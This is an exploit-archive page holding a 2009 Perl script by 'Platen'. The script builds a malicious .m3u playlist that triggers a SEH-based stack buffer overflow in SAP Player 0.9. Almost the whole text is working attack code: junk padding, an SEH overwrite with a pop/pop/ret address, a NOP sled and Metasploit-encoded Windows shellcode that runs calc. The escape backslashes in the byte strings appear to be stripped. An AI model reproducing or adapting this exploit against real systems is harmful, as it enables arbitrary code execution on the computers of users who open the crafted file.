[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SAP Player 0.9 (.m3u) Universal Local BOF Exploit (SEH)
# Published : 2009-09-03
# Author : Platen
# Previous Title : Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH)
# Next Title : Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)
#!/usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH) ##
## http://www.sorinara.com/sap/sap09.exe ##
## bug found & exploited by: PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder, Snake ##
## and all members in Pentesters.ir ##
############################################################
);
$junk="x41"x 35496;
$nseh = "xEBx06x90x90"; #short jump over SEH handler
$seh="x27x4ax01x10"; #universal p/p/r
$nop="x90"x 100;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38".
"x78x73x8ax83xebxfcxe2xf4xc4x90x37x8ax38x78xf8xcf".
"x04xf3x0fx8fx40x79x9cx01x77x60xf8xd5x18x79x98xc3".
"xb3x4cxf8x8bxd6x49xb3x13x94xfcxb3xfex3fxb9xb9x87".
"x39xbax98x7ex03x2cx57x8ex4dx9dxf8xd5x1cx79x98xec".
"xb3x74x38x01x67x64x72x61xb3x64xf8x8bxd3xf1x2fxae".
"x3cxbbx42x4ax5cxf3x33xbaxbdxb8x0bx86xb3x38x7fx01".
"x48x64xdex01x50x70x98x83xb3xf8xc3x8ax38x78xf8xe2".
"x04x27x42x7cx58x2exfax72xbbxb8x08xdax50x88xf9x8e".
"x67x10xebx74xb2x76x24x75xdfx1bx12xe6x5bx78x73x8a";
open(fhandle,'>>expl.m3u');
print fhandle $junk.$nseh.$seh.$nop.$shellcode;
close(fhandle);
print "n [+] File created successfully: expl.m3u n";
# www.Syue.com [2009-09-03]